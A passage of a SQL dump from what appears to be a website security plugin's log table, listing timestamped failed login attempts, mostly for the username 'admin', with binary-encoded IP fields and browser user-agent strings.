Gecko/20100101 Firefox/62.0'),(5624,8484,1629609406.588089,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5625,8485,1629609627.956547,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����R%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5626,8486,1629609890.543828,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��%���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5627,8487,1629610091.656841,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���F�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5628,8488,1629610219.083826,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(5629,8489,1629610319.029620,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����&*','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5630,8490,1629610573.346648,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5631,8491,1629610816.559126,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5632,8492,1629611013.470281,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���A\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5633,8493,1629611246.342975,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@vs','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5634,8494,1629611506.899030,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���b�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5635,8495,1629611903.226238,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Z�_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5636,8497,1629612379.292943,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5637,8498,1629612465.628434,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��:��^','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(5638,8499,1629612606.322268,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5639,8500,1629612823.732346,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Go','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5640,8501,1629613066.565644,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5641,8502,1629613296.247917,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5642,8503,1629613512.921692,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Ů�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5643,8504,1629613586.705632,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���n�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.107 Safari/537.36'),(5644,8505,1629613721.203181,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���\n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5645,8506,1629613954.385615,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��j�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5646,8509,1629614666.499900,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k��2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5647,8509,1629614666.562902,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k��2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5648,8510,1629614694.420026,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���B��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(5649,8511,1629614914.626974,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@om�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5650,8512,1629615143.798126,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��m��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5651,8513,1629615613.756543,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��k���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5652,8514,1629615822.778917,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.�yo','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'),(5653,8515,1629615828.092971,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��{9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5654,8515,1629615828.110912,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��{9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5655,8516,1629615961.265875,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����d�','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; InfoPath.2; MS-RTC LM 8; .NET CLR 3.5.21022; Tablet PC 2.0)'),(5656,8517,1629616147.006483,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����B','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5657,8518,1629616408.778764,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��6%','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5658,8519,1629616632.984707,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5659,8520,1629616876.041386,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5660,8521,1629616947.063335,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36'),(5661,8522,1629617135.220623,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3&P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5662,8523,1629617375.429080,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��#��w','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5663,8524,1629617588.525125,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���;��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5664,8525,1629617871.026737,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5665,8526,1629618150.730744,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���oC�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5666,8527,1629618354.324175,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5667,8528,1629618638.625959,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5668,8529,1629618890.308185,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���VBe','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5669,8529,1629618890.418311,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���VBe','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5670,8530,1629619161.959792,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��gt�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5671,8531,1629619162.626332,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���cr5','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(5672,8535,1629622473.946711,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"{��','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(5673,8536,1629623603.931992,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(5674,8536,1629623603.969346,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(5675,8537,1629624602.418378,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5676,8537,1629624602.452741,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E��t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5677,8539,1629627002.376646,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Ո]�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(5678,8543,1629630472.458647,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��.�yo','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5679,8544,1629631633.979577,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���^�M','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(5680,8548,1629635945.298582,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��?�)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5681,8549,1629636623.214307,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"Qq','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5682,8551,1629637504.622606,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����i','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(5683,8552,1629638677.281695,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(5684,8553,1629638793.670590,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��@Z(d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5685,8556,1629640173.114277,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��)�@K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5686,8556,1629640173.169214,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��)�@K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5687,8557,1629641033.642212,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-(��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5688,8559,1629641715.869393,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��E���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5689,8560,1629642143.486358,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��e�8','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5690,8564,1629643201.910387,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5691,8565,1629643394.215446,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�\Z','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(5692,8566,1629643551.251505,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��U�,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5693,8567,1629643891.833704,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5694,8568,1629644189.076894,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5695,8569,1629644565.098142,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Ո]�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(5696,8570,1629644880.504285,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��˫�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5697,8572,1629648114.944410,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ٮ�i','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5698,8572,1629648114.989133,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ٮ�i','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5699,8579,1629697597.230860,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5700,8580,1629698183.658037,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��n��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5701,8582,1629700287.622786,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��->�o','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5702,8584,1629701659.617796,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���_S�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),(5703,8586,1629702530.570589,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����f�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5704,8588,1629704132.728092,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Q֨','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5705,8589,1629704983.265167,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5706,8589,1629704983.312431,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5707,8590,1629705811.664391,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5708,8593,1629707997.288224,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(5709,8594,1629708373.614039,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5710,8597,1629711027.097937,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5711,8598,1629711925.123476,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��H�%�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5712,8600,1629713751.989585,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5713,8601,1629714681.753012,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5714,8602,1629716585.145965,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5715,8603,1629717525.019523,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���a��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5716,8604,1629719452.414901,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��ca�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5717,8606,1629721395.836948,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5718,8607,1629722335.738962,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����L`','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5719,8608,1629722543.829271,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��e ��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'),(5720,8609,1629723347.650295,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���&V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5721,8612,1629725327.372338,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��\"@�f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5722,8613,1629726328.270169,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��3&P','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5723,8614,1629727337.376429,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��%�[','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5724,8615,1629728338.345580,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����i_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5725,8616,1629728796.124422,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��-�M^','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(5726,8619,1629730396.966612,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��tK�','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(5727,8620,1629731387.008313,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���@r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5728,8621,1629732059.096359,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>|�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5729,8622,1629732465.746787,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5730,8624,1629733713.920627,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���贮','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36'),(5731,8627,1629738646.382436,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'),(5732,8628,1629739480.506946,1,'loginFailInvalidUsername','1c',0,'\0\0\0\0\0\0\0\0\0\0�����T','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5733,8630,1629740979.687867,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��gXM�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5734,8632,1629743417.522929,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���Z�w','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(5735,8633,1629743781.213305,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0����7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5736,8634,1629745017.263224,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_�� ','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36'),(5737,8635,1629748146.692619,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(5738,8636,1629749667.490523,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��_կ�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36'),(5739,8637,1629751155.358346,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��P�Ҕ','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5740,8639,1629752599.115420,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���#t;','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36'),(5741,8640,1629755483.135231,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\\�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(5742,8640,1629755483.182083,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0����\\�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.167 Safari/537.36'),(5743,8641,1629756929.548559,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0��QEˣ','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5744,8643,1629759806.751229,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0���>}�','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(5745,8645,1629762717.650875,1,'loginFailInvalidUsername','admin',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 